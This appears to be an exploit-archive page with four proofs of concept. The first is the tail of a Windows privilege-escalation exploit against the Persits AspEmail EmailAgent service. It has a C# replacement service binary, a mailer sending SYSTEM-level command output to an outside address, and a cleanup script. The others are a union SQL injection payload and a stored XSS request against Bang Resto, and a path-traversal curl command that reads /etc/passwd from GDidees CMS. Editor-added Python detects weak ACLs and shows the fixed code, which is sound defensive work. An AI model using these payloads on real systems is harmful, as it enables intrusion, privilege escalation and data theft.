\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" <br /><br /> \\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28<br /> <br />[+] wmic useraccount where 
sid="S-1-5-21-3674093405-176013069-2091862131-1511" get name<br /><br /> Name <br /><br /> DeepSecLab\Hacker <br /><br /> EmailAgent.exe Owner: DeepSecLab\Hacker<br /><br /># =================================================================================================================#<br /># #<br />####################################################################################################################<br /># #[EmailAgent.exe]# #<br />####################################################################################################################<br /># # <br /> #<br />* This payload is built so that when the server is rebooted (i.e. when the services are restarted), #<br />* it is started as the service binary and runs the commands we want, #<br />* and then e-mails the output to the address we specified. #<br /> #<br /> using System; #<br /> using System.Linq; #<br /> using System.Text; #<br /> using System.Diagnostics; #<br /> using System.IO; #<br /> using System.Collections; #<br /> #<br /> namespace CliToolSpace #<br /> { #<br /> class _Main #<br /> { #<br /> static void Main(string[] args) #<br /> { #<br /> Cli commandLine = new Cli(); #<br /> commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #<br /> commandLine.Execute(); #<br /> commandLine.ToFile(@"C:\Windows\Temp\"); #<br /> } #<br /> } #<br /> } #<br /> #<br /># #<br />####################################################################################################################<br /># #[Mail.exe]# #<br />####################################################################################################################<br /># #<br /> #<br /> using System; #<br /> using System.Net.Mail; #<br /> using System.Net; #<br /> SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #<br /> var mail = new MailMessage(); #<br /> mail.From = new MailAddress("mail@deepseclab.com"); #<br /> mail.To.Add("mail@hacker.com"); #<br /> mail.Subject = "Trigger Successful!"; #<br /> mail.IsBodyHtml = true; #<br /> string htmlBody; #<br /> htmlBody = "<strong>This server has been rebooted.</strong>"; #<br /> mail.Body = htmlBody; #<br /> Attachment attachment; #<br /> attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #<br /> mail.Attachments.Add(attachment); #<br /> SmtpServer.Port = 587; #<br /> SmtpServer.UseDefaultCredentials = false; #<br /> SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #<br /> SmtpServer.EnableSsl = true; #<br /> SmtpServer.Timeout = int.MaxValue; #<br /> SmtpServer.Send(mail); #<br /> #<br /># #<br />####################################################################################################################<br /># #[Run.bat]# #<br />####################################################################################################################<br /># #<br /> #<br /> whoami > C:\Windows\Temp\Export.txt #<br /> cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #<br /> del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #<br /> cd C:\Windows\Temp #<br /> del Run.bat & del Mail.exe #<br /> #<br /># #<br />####################################################################################################################<br /># #<br /> [+]Trigger Successful![+] #<br /> #<br />[+] C:\PenTest>systeminfo | findstr "Boot Time" #<br /> System Boot Time: 13.04.2022, 07:46:06 #<br /> #<br /># #<br />####################################################################################################################<br /> #[Export.txt]# #<br />####################################################################################################################<br /># #<br /> #<br /> NT AUTHORITY\SYSTEM #<br /> #<br /># #<br />####################################################################################################################<br /># # <br /># 
==================================================================================================================<br /># ...|||[FIX]|||... #<br /># ==================================================================================================================<br /># [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #<br /># =================================================================================================================#<br /><br />[+] C:\Administrator>sc qc "Persits Software EmailAgent"<br /> [SC] QueryServiceConfig SUCCESS<br /><br /> SERVICE_NAME: Persits Software EmailAgent<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : Persits Software EmailAgent<br /> DEPENDENCIES : rpcss<br /> SERVICE_START_NAME : LocalSystem<br /><br /># ==================================================================================================================<br /><br />[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"<br /><br /> D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)<br /><br /># ==================================================================================================================<br /><br />[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula<br /><br /> Accesschk v6.15 - Reports effective permissions for securable objects<br /> Copyright (C) 2006-2022 Mark Russinovich<br /> Sysinternals - www.sysinternals.com<br /><br /> Persits Software EmailAgent<br /> Medium Mandatory Level (Default) [No-Write-Up]<br /> RW NT AUTHORITY\SYSTEM<br /> SERVICE_ALL_ACCESS<br /> RW BUILTIN\Administrators<br /> SERVICE_ALL_ACCESS<br /> <br /># 
==================================================================================================================<br /><br />[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET<br /><br />[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"<br /><br /> Successfully processed 0 files; Failed processing 1 files<br /> C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.<br /><br /> DONE!<br /><br />* /RESET replaces the explicit ACEs with the inherited defaults, which removes the Everyone:(F) entry; the low-privileged user can no longer even read the BIN ACL. It does not restore ownership, so if takeown was used, set the owner back as well (for example icacls "C:\Program Files (x86)\Persits Software\AspEmail\BIN" /setowner "BUILTIN\Administrators"), and make sure the original EmailAgent.exe is back in place.<br /><br /># ==================================================================================================================<br /><br />[+] C:\Administrator>sc stop "Persits Software EmailAgent"<br /><br />[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"<br /><br />* These two commands are optional: they restart the "Persits Software EmailAgent" service. Once the directory ACL is fixed the service does not need to be stopped for the fix to take effect.<br /><br /># ==================================================================================================================<br /></code></pre>
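To look for this class of weakness on other services without running the exploit, here is an added example (the editor's code, not the exploit author's) that parses the two artefacts shown above: the icacls listing of the service's binary directory and the service security descriptor from sc sdshow. It reports filesystem ACEs that let principals other than administrators write into the directory, and service ACEs that let non-administrator SIDs reconfigure, delete or re-ACL the service. The icacls text and the SDDL below are copied from this page's output; the weakened SDDL and hex-mask forms in the checks are constructed. Gather real input with the same commands shown above and pass the text in.

```python
import re

# Principals expected to hold write access on a service's install directory.
TRUSTED_PRINCIPALS = {
    "NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
    "NT SERVICE\\TrustedInstaller", "CREATOR OWNER",
}
# icacls simple rights and specific rights that allow replacing or altering files.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WA", "WEA", "DC", "D", "DE", "WDAC", "WO"}
ICACLS_ACE_RE = re.compile(r"(?P<who>[^:()]+):(?P<flags>(?:\([^()]*\))+)")

# SDDL ACE: (type;flags;rights;object_guid;inherit_guid;sid). For a service object the
# generic two-letter codes map to: DC=SERVICE_CHANGE_CONFIG, SD=DELETE, WD=WRITE_DAC, WO=WRITE_OWNER.
SERVICE_DANGEROUS = {"DC": "SERVICE_CHANGE_CONFIG", "SD": "DELETE", "WD": "WRITE_DAC",
                     "WO": "WRITE_OWNER", "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE"}
SERVICE_DANGEROUS_BITS = {0x0002: "SERVICE_CHANGE_CONFIG", 0x10000: "DELETE",
                          0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
TRUSTED_SIDS = {"SY", "BA"}
SDDL_ACE_RE = re.compile(r"\((?P<type>[^;]*);[^;]*;(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]*)\)")


def parse_icacls(path, output):
    """Return (principal, [flag tokens]) for each ACE line of `icacls <path>` output."""
    aces = []
    for line in output.splitlines():
        line = line.strip()
        if line.startswith(path):              # the first line carries the queried path
            line = line[len(path):].strip()
        m = ICACLS_ACE_RE.fullmatch(line)
        if m:
            aces.append((m["who"], re.findall(r"\(([^()]*)\)", m["flags"])))
    return aces


def weak_dir_aces(path, output):
    """Allow-ACEs granting write on the directory to principals outside TRUSTED_PRINCIPALS."""
    findings = []
    for who, tokens in parse_icacls(path, output):
        if "DENY" in tokens or who in TRUSTED_PRINCIPALS:
            continue
        perm = tokens[-1]                      # last token is the permission list, e.g. F or RX,W
        if set(perm.split(",")) & WRITE_RIGHTS:
            findings.append((who, perm))
    return findings


def weak_service_aces(sddl):
    """Allow-ACEs in the DACL of `sc sdshow` output that give non-admin SIDs dangerous
    service rights. Rights may be two-letter codes or a hex mask."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))*)", sddl)
    findings = []
    for m in SDDL_ACE_RE.finditer(dacl.group(1) if dacl else ""):
        if m["type"] != "A" or m["sid"] in TRUSTED_SIDS:
            continue
        rights = m["rights"]
        if rights.lower().startswith("0x"):
            mask = int(rights, 16)
            hit = [name for bit, name in SERVICE_DANGEROUS_BITS.items() if mask & bit]
        else:
            codes = [rights[i:i + 2] for i in range(0, len(rights), 2)]
            hit = [SERVICE_DANGEROUS[c] for c in codes if c in SERVICE_DANGEROUS]
        if hit:
            findings.append((m["sid"], sorted(hit)))
    return findings


# Inputs copied from this page's output: the BIN path, its icacls listing, the service SDDL.
BIN_DIR = r"C:\Program Files (x86)\Persits Software\AspEmail\BIN"
ICACLS_OUTPUT = r"""C:\Program Files (x86)\Persits Software\AspEmail\BIN Everyone:(OI)(CI)(F)
                                                  DeepSecLab\psacln:(I)(OI)(CI)(N)
                                                  BUILTIN\Administrators:(I)(F)
                                                  CREATOR OWNER:(I)(OI)(CI)(IO)(F)
                                                  NT SERVICE\TrustedInstaller:(I)(CI)(F)
                                                  NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
                                                  BUILTIN\Users:(I)(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""
SERVICE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

if __name__ == "__main__":
    print("directory writable by non-admins:", weak_dir_aces(BIN_DIR, ICACLS_OUTPUT))
    print("service reconfigurable by non-admins:", weak_service_aces(SERVICE_SDDL))
```

On this page's data the service descriptor is clean (Interactive and Service logons get query and status rights only), which is exactly why the attack goes through the filesystem: the directory ACE Everyone:(F) is the only finding, and it is sufficient because the service runs the binary from that directory as LocalSystem.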
<pre><code># Exploit Title: Bang Resto v1.0 - 'Multiple' SQL Injection<br /># Date: 2023-04-02<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage:<br />https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html<br /># Software Link:<br />https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip<br /># Version: 1.0<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-29849<br /><br />*Affected Parameters:*<br />btnMenuItemID, itemID, itemID[], itemPrice, itemqty[], menuID, staffID<br /><br />*Steps to Reproduce:*<br />1. First, log in to the staff panel.<br />2. Go to the "order" menu, select a menu item and create an order while intercepting the request with Burp Suite. The request will look like:<br /><br />POST /bangresto/staff/displayitem.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/111.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 194<br />Origin: http://127.0.0.1<br />Referer: http://127.0.0.1/bangresto/staff/order.php<br />Cookie: PHPSESSID=2rqvjgkoog89i6g7dn7evdkmk5<br />Connection: close<br /><br />btnMenuItemID=1&qty=1<br /><br />3. The "btnMenuItemID" parameter is vulnerable. Inject a union-based payload into it, for example ".1 union select<br />1,2,3,CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,0x56657273696f6e3a3a3a3a20,VERSION())--<br />-". The hex literals are just the labels "User:::: ", "Database::::: " and "Version:::: " with "<br>" separators.<br />4. The response in the browser now shows the database user, database name and version.<br /></code></pre>
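The vulnerable query shape beside its fixed form, as an added example written for this page and not Bang Resto's PHP code: the table and rows are a constructed stand-in for the application's menu data, since the real schema is not on the page, and SQLite stands in for MySQL, so the injected SELECT uses sqlite_version() where the page's payload uses VERSION() and CONCAT_WS. The helper decodes the hex literals of the page's payload so you can read what it prints.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the application's menu table (schema assumed)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE menuitem (itemID INTEGER, itemName TEXT, itemPrice REAL, menuID INTEGER);
        INSERT INTO menuitem VALUES (1, 'Nasi Goreng', 25000, 1), (2, 'Es Teh', 5000, 2);
    """)
    return con


def display_item_vulnerable(con, btn_menu_item_id):
    """The request parameter is concatenated into the statement, so SQL in the value runs."""
    sql = f"SELECT itemID, itemName, itemPrice, menuID FROM menuitem WHERE itemID = {btn_menu_item_id}"
    return con.execute(sql).fetchall()


def display_item_fixed(con, btn_menu_item_id):
    """Validate the type, then bind the value; the driver never parses it as SQL."""
    item_id = int(btn_menu_item_id)            # raises ValueError on anything but an integer
    sql = "SELECT itemID, itemName, itemPrice, menuID FROM menuitem WHERE itemID = ?"
    return con.execute(sql, (item_id,)).fetchall()


# Four columns so the UNION lines up with the SELECT above; MySQL would use VERSION().
INJECTION = "1 union select 1,2,3,sqlite_version()-- -"


def decode_hex_literals(payload):
    """Render 0x... string literals, as used in the page's CONCAT_WS payload, as text."""
    def repl(m):
        digits = m.group(1)
        if len(digits) % 2:                    # not a byte string; leave it alone
            return m.group(0)
        return bytes.fromhex(digits).decode("latin-1")
    return re.sub(r"0x([0-9a-fA-F]+)", repl, payload)


if __name__ == "__main__":
    db = make_db()
    print(display_item_vulnerable(db, INJECTION))   # the extra row carries the DB version
    try:
        display_item_fixed(db, INJECTION)
    except ValueError as e:
        print("rejected:", e)
    print(decode_hex_literals("CONCAT_WS(0x203a20,0x557365723a3a3a3a20,USER(),0x3c62723e,"
                              "0x44617461626173653a3a3a3a3a20,DATABASE(),0x3c62723e,"
                              "0x56657273696f6e3a3a3a3a20,VERSION())"))
```

The integer cast is what closes the numeric-context injection on this parameter; for the string-typed parameters in the affected list, binding alone (no cast) is the fix, and the bound value can contain quotes or UNION without effect.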
<pre><code># Exploit Title: Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)<br /># Date: 2023-04-02<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage:<br />https://www.hockeycomputindo.com/2021/05/restaurant-pos-source-code-free.html<br /># Software Link:<br />https://github.com/mesinkasir/bangresto/archive/refs/heads/main.zip<br /># Version: 1.0<br /># Tested on: Windows 10, PHP 7.4.29, Apache 2.4.53<br /># CVE: CVE-2023-29848<br /><br />*Steps to Reproduce:*<br />1. First, log in to the admin panel.<br />2. Go to the Menu section and click "add new menu" in a group. The request will look like:<br /><br />POST /bangresto/admin/menu.php HTTP/1.1<br />Host: 127.0.0.1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)<br />Gecko/20100101 Firefox/111.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 87<br />Origin: http://127.0.0.1<br />Referer: http://127.0.0.1/bangresto/admin/menu.php<br />Cookie: PHPSESSID=2vjsfgt0koh0qdiq5n6d17utn6<br />Connection: close<br /><br />itemName=test&itemPrice=1&menuID=1&addItem=<br /><br />3. Put any XSS payload in the "itemName" parameter and click add.<br />4. The payload is stored with the item and executes when the item name is rendered, producing the XSS pop-up.<br /></code></pre>
<pre><code># Exploit Title: GDidees CMS - 'imgdownload.php' Local File Disclosure<br /># Date : 03/27/2023<br /># Exploit Author : Hadi Mene<br /># Vendor Homepage : https://www.gdidees.eu/<br /># Software Link : https://www.gdidees.eu/cms-1-0.html<br /># Version : 3.9.1 and earlier<br /># Tested on : Debian 11<br /># CVE : CVE-2023-27179<br /><br />### Summary:<br /><br />GDidees CMS v3.9.1 and lower versions were discovered to contain a local file disclosure vulnerability via the filename parameter at /_admin/imgdownload.php.<br /><br /><br />### Description :<br /><br />imgdownload.php is mainly used by the QR code generation module to download a QR code.<br />The vulnerability occurs in line 4, where the filename parameter, which is opened later, is neither filtered nor sanitized.<br />Furthermore, there is no admin session check in this code, although there should be, since only the admin user<br />should normally be able to download QR codes. The file is therefore readable without any authentication.<br /><br />Vulnerable Code :<br /><br />3. if (isset($_GET["filename"])) {<br />4. $filename=$_GET["filename"];<br /> .....<br /> .....<br />27. @readfile($filename) OR die();<br /><br /><br />### POC :<br /><br />URL : https://[GDIDEESROOT]/_admin/imgdownload.php?filename=../../../../../../etc/passwd<br /><br />Exploitation using curl<br /># curl http://192.168.0.32/cmsgdidees3.9.1-mysqli/_admin/imgdownload.php?filename=../../../../../etc/passwd<br /><br />root:x:0:0:root:/root:/bin/bash<br />daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin<br />bin:x:2:2:bin:/bin:/usr/sbin/nologin<br />sys:x:3:3:sys:/dev:/usr/sbin/nologin<br />sync:x:4:65534:sync:/bin:/bin/sync<br />games:x:5:60:games:/usr/games:/usr/sbin/nologin<br />man:x:6:12:man:/var/cache/man:/usr/sbin/nologin<br />lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin<br />mail:x:8:8:mail:/var/mail:/usr/sbin/nologin<br />news:x:9:9:news:/var/spool/news:/usr/sbin/nologin<br />uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin<br />proxy:x:13:13:proxy:/bin:/usr/sbin/nologin<br />www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin<br />backup:x:34:34:backup:/var/backups:/usr/sbin/nologin<br />list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin<br />irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin<br />gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin<br />nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin<br />_apt:x:100:65534::/nonexistent:/usr/sbin/nologin<br />systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin<br />systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin<br />systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin<br />ntp:x:104:110::/nonexistent:/usr/sbin/nologin<br />messagebus:x:105:111::/nonexistent:/usr/sbin/nologin<br />uuidd:x:106:112::/run/uuidd:/usr/sbin/nologin<br />pulse:x:107:115:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin<br />lightdm:x:108:117:Light Display Manager:/var/lib/lightdm:/bin/false<br />hadi:x:1000:1000:hadi,,,:/home/hadi:/bin/bash<br />systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin<br />vboxadd:x:998:1::/var/run/vboxadd:/bin/false<br />openldap:x:109:118:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false<br />sshd:x:110:65534::/run/sshd:/usr/sbin/nologin<br />mysql:x:111:120:MySQL Server,,,:/nonexistent:/bin/false<br /><br /><br />### References:<br />https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27179<br />https://nvd.nist.gov/vuln/detail/CVE-2023-27179<br />https://www.exploit-db.com/papers/12883<br /></code></pre>
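The two defects the description names, the unchecked filename passed to readfile() and the missing admin session check, side by side with a hardened handler, as an added example that is not from the advisory or from GDidees CMS. The directory layout, the fake QR image and the secret file standing in for /etc/passwd are constructed in a temporary directory so the demo runs offline; the session dict and its is_admin key are assumptions. The hardened version canonicalises the requested path with realpath() and refuses anything that does not resolve inside the QR directory, which catches ../ sequences, absolute paths and symlinks alike, and additionally restricts downloads to .png files.

```python
import os
import tempfile


def make_fixture():
    """Constructed layout: <root>/_admin/qrcodes/order1.png is the legitimate
    download target; <root>/secret.txt stands in for /etc/passwd, i.e. a file
    outside the directory the script is meant to serve."""
    root = tempfile.mkdtemp()
    qr_dir = os.path.join(root, "_admin", "qrcodes")
    os.makedirs(qr_dir)
    with open(os.path.join(qr_dir, "order1.png"), "wb") as f:
        f.write(b"\x89PNG fake qr")
    with open(os.path.join(root, "secret.txt"), "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    return root, qr_dir


def vulnerable_download(qr_dir, filename):
    """Mirrors @readfile($_GET['filename']): the parameter is used as a path as-is.

    os.path.join() keeps the PHP behaviour: '../' walks out of qr_dir and an
    absolute filename replaces it entirely.
    """
    with open(os.path.join(qr_dir, filename), "rb") as f:
        return f.read()


def check_download_path(qr_dir, filename):
    """Return the canonical path if it stays inside qr_dir and is a .png, else None."""
    base = os.path.realpath(qr_dir)
    target = os.path.realpath(os.path.join(base, filename))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:          # different drives on Windows: certainly not inside
        inside = False
    if not inside or not target.endswith(".png") or not os.path.isfile(target):
        return None
    return target


def safe_download(qr_dir, filename, session):
    """Hardened handler: admin session required, then only vetted paths are read.

    Returns the file bytes, or None when the request is refused.
    """
    if not session.get("is_admin"):            # the check the original code lacks
        return None
    target = check_download_path(qr_dir, filename)
    if target is None:
        return None
    with open(target, "rb") as f:
        return f.read()


if __name__ == "__main__":
    root, qr_dir = make_fixture()
    print("vulnerable:", vulnerable_download(qr_dir, "../../secret.txt"))
    print("safe, traversal:", safe_download(qr_dir, "../../secret.txt", {"is_admin": True}))
    print("safe, legit:    ", safe_download(qr_dir, "order1.png", {"is_admin": True}))
```

The realpath-then-commonpath check is the general fix for this bug class; a blacklist of "../" substrings is not, because URL-encoded and mixed separators get past it while still reaching the filesystem.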